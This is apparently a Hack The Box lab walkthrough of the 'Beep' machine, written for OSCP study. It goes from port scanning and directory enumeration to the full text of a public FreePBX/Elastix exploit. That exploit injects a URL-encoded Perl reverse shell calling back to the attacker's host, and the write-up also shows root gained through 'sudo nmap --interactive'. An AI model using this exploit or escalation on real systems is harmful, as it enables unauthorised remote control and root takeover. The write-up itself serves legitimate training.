TJ_Null’s OSCP Prep – HTB – Beep
Beep is a linux machine which has alot of ports open, so enumeration took along time. There were many ways to exploit this machine, and getting root as well. However I’ll not show all of them. The webserver is running a vulnerable version of Elastix, which result in RCE. The low privileged user could run many commands as sudo, giving us alot of option to escalate our privilege.
Table Of Contents
Enumeration
I’ll first stat with an nmap scan.
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/beep]
└─# nmap -sC -sV -p- --min-rate 10000 -oN nmap.result 10.10.10.7
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-19 15:29 EST
Stats: 0:01:41 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 93.75% done; ETC: 15:31 (0:00:06 remaining)
Nmap scan report for 10.10.10.7
Host is up (0.030s latency).
Not shown: 65519 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp open http Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: APOP LOGIN-DELAY(0) STLS PIPELINING UIDL USER RESP-CODES AUTH-RESP-CODE IMPLEMENTATION(Cyrus POP3 server v2) TOP EXPIRE(NEVER)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 875/udp status
|_ 100024 1 878/tcp status
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_imap-capabilities: BINARY Completed THREAD=ORDEREDSUBJECT LIST-SUBSCRIBED ACL UIDPLUS OK STARTTLS URLAUTHA0001 SORT=MODSEQ IMAP4 CATENATE CHILDREN IDLE MULTIAPPEND CONDSTORE X-NETSCAPE NAMESPACE UNSELECT MAILBOX-REFERRALS SORT LISTEXT RIGHTS=kxte ANNOTATEMORE ID RENAME NO IMAP4rev1 LITERAL+ THREAD=REFERENCES ATOMIC QUOTA
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_imap-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS))
|_http-server-header: Apache/2.2.3 (CentOS)
|_ssl-date: 2022-01-19T21:34:53+00:00; +1h01m51s from scanner time.
| http-robots.txt: 1 disallowed entry
|_/
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after: 2018-04-07T08:22:08
|_http-title: Elastix - Login page
878/tcp open status 1 (RPC #100024)
993/tcp open ssl/imap Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp open pop3 Cyrus pop3d
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-known-key: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
3306/tcp open mysql MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp open upnotifyp?
4559/tcp open hylafax HylaFAX 4.3.10
5038/tcp open asterisk Asterisk Call Manager 1.1
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix
Host script results:
|_clock-skew: 1h01m50s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 316.87 secondsThere were many ports open. To make it easier to see all open ports, I ran a new scan with nmap, leaving out version and default scripts.
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/beep]
└─# nmap -p- --min-rate 10000 10.10.10.7
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-20 14:24 EST
Nmap scan report for beep.htb (10.10.10.7)
Host is up (0.068s latency).
Not shown: 65519 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
143/tcp open imap
443/tcp open https
878/tcp open unknown
993/tcp open imaps
995/tcp open pop3s
3306/tcp open mysql
4190/tcp open sieve
4445/tcp open upnotifyp
4559/tcp open hylafax
5038/tcp open unknown
10000/tcp open snet-sensor-mgmtEnumerating all these ports took some time. So lets take a look at the webserver running on port 80.
The webserver redirects us to HTTPS. The webserver is running Elastix. Elastix is an unified communications server software that brings together IP PBX, email, IM, faxing and collaboration functionality. That explains all the open ports on these machine.
Running a gobuster scan against port 80. -k for skipping SSL cert verification, otherwise the scan will fail.
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/beep]
└─# gobuster dir -u https://10.10.10.7 -w /usr/share/wordlists/dirb/big.txt -k
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
/.htaccess (Status: 403) [Size: 287]
/.htpasswd (Status: 403) [Size: 287]
/admin (Status: 301) [Size: 309] [--> https://10.10.10.7/admin/]
/cgi-bin/ (Status: 403) [Size: 286]
/configs (Status: 301) [Size: 311] [--> https://10.10.10.7/configs/]
/favicon.ico (Status: 200) [Size: 894]
/help (Status: 301) [Size: 308] [--> https://10.10.10.7/help/]
/images (Status: 301) [Size: 310] [--> https://10.10.10.7/images/]
/lang (Status: 301) [Size: 308] [--> https://10.10.10.7/lang/]
/libs (Status: 301) [Size: 308] [--> https://10.10.10.7/libs/]
/mail (Status: 301) [Size: 308] [--> https://10.10.10.7/mail/]
/modules (Status: 301) [Size: 311] [--> https://10.10.10.7/modules/]
/panel (Status: 301) [Size: 309] [--> https://10.10.10.7/panel/]
/recordings (Status: 301) [Size: 314] [--> https://10.10.10.7/recordings/]
/robots.txt (Status: 200) [Size: 28]
/static (Status: 301) [Size: 310] [--> https://10.10.10.7/static/]
/themes (Status: 301) [Size: 310] [--> https://10.10.10.7/themes/]
/var (Status: 301) [Size: 307] [--> https://10.10.10.7/var/]
/vtigercrm (Status: 301) [Size: 313] [--> https://10.10.10.7/vtigercrm/]
===============================================================
2022/01/21 14:45:53 Finished
===============================================================
Going to /admin we are prompted with a popup login. Clicking cancel, we are redirected to this page.
So we can see that the webserver is also running FreePBX 2.8.1.4.
From a forum post I saw, it explained the difference between FreePBX and Elastix.
Asterisk started it all, and is the base platform switch under the covers handling the main switch funtions.
Freepbx came along to make it easier to use GUI with some extra tools. Huge for new users.
Elastix leveraged Freepbx version and added applications like the call center that enables you to manage large call groups effectively. They also packaged several other great products with the platform to make the install a complete business communicaitons platform.
https://www.elastix.org/community/threads/difference-between-elastix-freepbx-and-asterisk.115899/
Initial Access
There is a vulnerability in FreePBX/Elastix which can give us RCE.
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/beep]
└─# cat 18650.py
#!/usr/bin/python
############################################################
# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit
# Google Dork: oy vey
# Date: March 23rd, 2012
# Author: muts, SSL update by Emporeo
# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others.
# Tested on: multiple
# CVE : notyet
# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/
# Archive Url : http://www.offensive-security.com/0day/freepbx_callmenum.py.txt
############################################################
# Discovered by Martin Tschirsich
# http://seclists.org/fulldisclosure/2012/Mar/234
# http://www.exploit-db.com/exploits/18649
############################################################
import urllib
import ssl
rhost="localhost"
lhost="10.10.14.17"
lport=4444
extension="233"
ssl._create_default_https_context = ssl._create_unverified_context
# Reverse shell payload
url = 'http://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
urllib.urlopen(url)
In order for this script to work, we have to do a couple of things. Since this server is so old, the SSL cert is no longer valid an throws error at us. You can either strip ssl, or redirect traffic from localhost to 10.10.10.7:443 through burpsuite.
Then you have to find the exisiting extension line. Using sipvicious svwar.py script, we could easily find it.
┌──(root💀kali)-[/home/…/HTB/beep/sipvicious/sipvicious]
└─# python3 svwar.py -m INVITE -e100-500 10.10.10.7
| Extension | Authentication |
------------------------------
| 233 | reqauth |Starting a NC listener and runing the script will give us a connection.
┌──(root💀kali)-[/home/aghanim]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.7] 54087
whoami
asterisk
Root
Running sudo -l as asterisk gave us a list of commands the user can run as sudo.
bash-3.2$ sudo -l
Matching Defaults entries for asterisk on this host:
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY"
User asterisk may run the following commands on this host:
(root) NOPASSWD: /sbin/shutdown
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/bin/yum
(root) NOPASSWD: /bin/touch
(root) NOPASSWD: /bin/chmod
(root) NOPASSWD: /bin/chown
(root) NOPASSWD: /sbin/service
(root) NOPASSWD: /sbin/init
(root) NOPASSWD: /usr/sbin/postmap
(root) NOPASSWD: /usr/sbin/postfix
(root) NOPASSWD: /usr/sbin/saslpasswd2
(root) NOPASSWD: /usr/sbin/hardware_detector
(root) NOPASSWD: /sbin/chkconfig
(root) NOPASSWD: /usr/sbin/elastix-helperbash-3.2$ sudo nmap --interactive
Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
sh-3.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-3.2# What I’ve learned
- This box was kind of overwhelming with how many ways there was to get shell, as well as all the ports open. Understanding the connection between all the open ports is important.
- Focusing on ports I know and not doing too much as the same time will surely increase my effectiveness.
- Before doing an exploit, finish with the enumeration stage. Document everything in a note taking app. I use Obsidian for that, which is an amazing note taking tool that uses markdown language.
